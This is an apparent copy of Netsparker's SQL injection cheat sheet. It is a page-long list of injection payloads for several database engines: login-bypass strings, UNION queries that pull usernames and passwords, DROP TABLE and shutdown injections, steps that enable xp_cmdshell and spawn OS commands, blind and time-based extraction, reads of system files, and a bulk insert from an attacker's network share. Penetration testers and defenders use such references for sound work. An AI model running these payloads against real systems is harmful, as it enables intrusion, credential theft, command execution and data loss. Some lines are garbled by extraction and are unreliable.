
SQL Injection Cheat Sheet - Netsparker

This document provides a cheat sheet of SQL injection payloads for exploiting vulnerabilities in different SQL databases. It includes examples of comments, strings, hexadecimal values, unions, stored procedures and other techniques that can be used to manipulate SQL queries and potentially access unauthorized data or execute commands. The payloads demonstrate various ways to terminate strings, bypass input filtering, perform union queries, make stored procedure calls and more.


SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...


--
DROP sampletable;--

#
DROP sampletable;#

admin'--

SELECT * FROM members WHERE username = 'admin'--' AND password =


'password'

/*Comment Here*/
DROP/*comment*/sampletable

DR/**/OP/*bypass blacklisting*/sampletable

SELECT/*avoid-spaces*/password/**/FROM/**/Members

/*! MYSQL Special SQL *

SELECT /*!32302 1/0, */ 1 FROM tablename

10; DROP TABLE members /*


10; DROP
TABLE members --

SELECT /*!32302 1/0, */ 1 FROM tablename

/*! 32302 10*/


10

SELECT /*!32302 1/0, */ 1 FROM tablename

;
SELECT * FROM members; DROP members--

10;DROP members --

SELECT * FROM products WHERE id = 10; DROP members--

IF(condition,true-part,false-part)


SELECT IF(1=1,'true','false')

IF condition true-part ELSE false-part


IF (1=1) SELECT 'true' ELSE SELECT 'false'

BEGIN
IF condition THEN true-part; ELSE false-part; END IF; END;
IF (1=1) THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF;
END;

SELECT CASE WHEN condition THEN true-part ELSE false-part


SELECT CASE WEHEN (1=1) THEN 'A' ELSE 'B'END;

if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select


1/0

0xHEXNUMBER

SELECT CHAR(0x66)
SELECT 0x5045
SELECT 0x50 + 0x45

+
SELECT login + '-' + password FROM members

||
SELECT login || '-' || password FROM members

CONCAT()


CONCAT(str1, str2, str3, ...)

SELECT CONCAT(login, password) FROM members

CHAR() CONCAT()

0x457578
SELECT 0x457578

SELECT CONCAT('0x',HEX('c:\\boot.ini'))

CONCAT()
SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))

SELECT CHAR(75)+CHAR(76)+CHAR(77)

SELECT CHR(75)||CHR(76)||CHR(77)

SELECT (CHaR(75)||CHaR(76)||CHaR(77))

SELECT LOAD_FILE(0x633A5C626F6F742E696E69)

ASCII()

SELECT ASCII('a')

CHAR()

SELECT CHAR(64)

SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members


' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--

field COLLATE SQL_Latin1_General_Cp1254_CS_AS

SELECT header FROM news UNION ALL SELECT name COLLATE


SQL_Latin1_General_Cp1254_CS_AS FROM members

Hex()

admin' --

admin' #

admin'/*

' or 1=1--

' or 1=1#

' or 1=1/*

') or '1'='1--

') or ('1'='1--

' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--


admin' AND 1=0 UNION ALL SELECT 'admin',


'81dc9bdb52d04dc20036dbd8313ed055'
1234

81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)

HAVING 1=1 --

' GROUP BY table.columnfromerror1 HAVING 1=1 --

' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --

' GROUP BY table.columnfromerror1, columnfromerror2,


columnfromerror(n) HAVING 1=1 --

ORDER BY 1--

ORDER BY 2--

ORDER BY N--


' union select sum(columntofind) from users--


Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average
aggregate operation cannot take a varchar data type as an argument.

SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null,


NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULl, NULL--

11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –-

11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 –-

11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 --

11223344) UNION SELECT 1,'2',NULL,NULL WHERE 1=2 –-

11223344) UNION SELECT 1,'2',3,NULL WHERE 1=2 –-

Microsoft OLE DB Provider for SQL Server error '80040e07'


Explicit conversion from data type int to image is not allowed.

'; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*


INSERT INTO members(id, user, pass) VALUES(1,


''+SUBSTRING(@@version,1,10) ,10)

bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp


-c -Slocalhost -Usa -Pfoobar

declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec
sp_oamethod @o, 'run', NULL, 'notepad.exe' --

EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'

EXEC master.dbo.xp_cmdshell 'ping '

master..sysmessages

master..sysservers

masters..sysxlogins
sys.sql_logins


SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/

DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result =


0) SELECT 0 ELSE SELECT 1/0

INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"


SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10
;

';shutdown --

EXEC sp_configure 'show advanced options',1


RECONFIGURE

EXEC sp_configure 'xp_cmdshell',1


RECONFIGURE

SELECT name FROM sysobjects WHERE xtype = 'U'

SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE


name = 'tablenameforcolumnnames')

NOT IN NOT EXIST


... WHERE users NOT IN ('First User', 'Second User')
SELECT TOP 1 name FROM members WHERE NOT EXIST(SELECT TOP 0 name
FROM members)

SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from


(SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE
i.id<=o.id) AS x, name from sysobjects o) as p where p.x=3) as int


Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects


i WHERE xtype='U' and i.id<=o.id) AS x, name from sysobjects o WHERE
o.xtype = 'U') as p where p.x=21

';BEGIN DECLARE @rt varchar(8000) SET @rd=':' SELECT @rd=@rd+' '+name


FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name =
'MEMBERS') AND name>@rd SELECT @rd AS rd into TMP_SYS_TMP end;--

SELECT table_name FROM information_schema.tables WHERE table_schema =


'tablename'

SELECT table_name, column_name FROM information_schema.columns WHERE


table_schema = 'tablename'

SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'

SELECT * FROM all_col_comments WHERE TABLE_NAME = 'TABLE'


TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND


ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE
xtYpe=0x55)),1,1)),0)>78--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND


ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE
xtYpe=0x55)),1,1)),0)>103--

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND


ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE
xtYpe=0x55)),1,1)),0)
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND
ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE
xtYpe=0x55)),1,1)),0)>89--

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND


ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE
xtYpe=0x55)),1,1)),0)
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND
ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE
xtYpe=0x55)),1,1)),0)>83--


TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND


ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE
xtYpe=0x55)),1,1)),0)
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND
ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE
xtYpe=0x55)),1,1)),0)>80--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND


ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE
xtYpe=0x55)),1,1)),0)

WAITFOR DELAY '0:0:10'--

WAITFOR DELAY '0:0:0.51'

if (select user) = 'sa' waitfor delay '0:0:10'

1;waitfor delay '0:0:10'--

1);waitfor delay '0:0:10'--

1';waitfor delay '0:0:10'--

1');waitfor delay '0:0:10'--

1));waitfor delay '0:0:10'--


1'));waitfor delay '0:0:10'--

BENCHMARK(howmanytimes, do this)

IF EXISTS (SELECT * FROM users WHERE username = 'root')


BENCHMARK(1000000000,MD5(1))

IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))

SELECT pg_sleep(10);

SELECT sleep(10);

(SELECT CASE WHEN (NVL(ASCII(SUBSTR(({INJECTION}),1,1)),0) = 100)


THEN dbms_pipe.receive_message(('xyz'),10) ELSE
dbms_pipe.receive_message(('xyz'),1) END FROM dual)


product.asp?id=4 (SMO)
product.asp?id=5-1

product.asp?id=4 OR 1=1

product.asp?name=Book
product.asp?name=Bo'%2b'ok

product.asp?name=Bo' || 'ok (OM)

product.asp?name=Book' OR 'x'='x

SELECT User,Password FROM mysql.user;

SELECT 1,1 UNION SELECT


IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0)
User,Password FROM mysql.user WHERE User = 'root';

SELECT ... INTO DUMPFILE


Write query into a new file (cannot modify existing files)

create function LockWorkStation returns integer soname


'user32';

select LockWorkStation();

create function ExitProcess returns integer soname 'kernel32';

select exitprocess();

SELECT USER();

SELECT password,USER() FROM mysql.user;

SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE


user_group = 1;

query.php?user=1+union+select+load_file(0x63...),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1

create table foo( line blob );


load data infile 'c:/boot.ini' into table foo;


select * from foo;

select benchmark( 500000, sha1( 'test' ) );

query.php?user=1+union+select+benchmark(500000,sha1
(0x414141)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1

select if( user() like 'root@%', benchmark(100000,sha1('test')),


'false' );

select if( (ascii(substring(user(),1,1)) >> 7) & 1,


benchmark(100000,sha1('test')), 'false' );

MD5()

SHA1()

PASSWORD()

ENCODE()

COMPRESS()

ROW_COUNT()

SCHEMA()

VERSION()
@@version

' + (SELECT TOP 1 password FROM users ) + '


[email protected]


bulk insert foo from '\\YOURIPADDRESS\C$\x.txt'
